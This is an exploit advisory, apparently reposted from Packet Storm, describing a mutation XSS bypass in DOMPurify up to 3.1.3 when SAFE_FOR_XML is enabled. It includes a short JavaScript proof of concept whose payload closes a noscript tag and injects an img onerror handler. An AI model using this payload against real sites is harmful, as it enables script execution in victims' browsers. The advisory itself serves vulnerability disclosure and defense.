## https://sploitus.com/exploit?id=PACKETSTORM:216757
=============================================================================================================================================
| # Title : DOMPurify β€ 3.1.3 Mutation XSS via <noscript> Tag Bypass with SAFE_FOR_XML |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/dompurify |
=============================================================================================================================================
[+] Summary : A Mutation Cross-Site Scripting (mXSS) vulnerability exists in DOMPurify versions β€ 3.1.3 when the SAFE_FOR_XML configuration is enabled.
Due to improper handling of the </noscript> closing tag during sanitization, a crafted payload can bypass filtering mechanisms.
The sanitizer processes the input as inert text, while the browser's HTML parser interprets it as executable markup when inserted into a <noscript> context.
This parsing discrepancy allows attackers to inject malicious HTML elements (e.g., <img onerror>), leading to arbitrary JavaScript execution in the victimβs browser.
[+] POC :
import DOMPurify from 'dompurify';
const payload = `</noscript><img src=x onerror=alert(1)>`;
const config = {
SAFE_FOR_XML: true
};
const clean = DOMPurify.sanitize(payload, config);
console.log("Sanitized output:", clean);
const container = document.createElement("div");
container.innerHTML = `<noscript>${clean}</noscript>`;
document.body.appendChild(container);
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================